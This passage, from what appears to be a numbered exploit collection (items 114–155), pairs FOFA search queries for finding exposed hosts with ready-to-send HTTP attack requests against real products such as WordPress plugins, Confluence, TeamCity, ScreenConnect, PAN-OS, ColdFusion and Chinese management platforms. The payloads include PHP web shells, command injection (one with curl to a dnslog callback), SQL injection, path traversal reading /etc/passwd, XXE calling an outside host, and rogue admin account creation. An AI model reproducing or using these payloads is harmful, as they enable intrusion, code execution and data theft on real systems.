Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo (百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Access /home/src.php

119. Beijing Baichuo (百绰) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo (百绰) Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328

File path: /upload/2.php

121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

File path: boot/web/upload/weblogo/1.php

122. 北京百绰智能 s200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement in base64; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. 湖南建研 engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the backend directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. 广联达 Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 云商城 file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. 网康 (Netentsec) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. 网康 (Netentsec) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. 福建科立讯 communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component id
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. 天维尔 fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
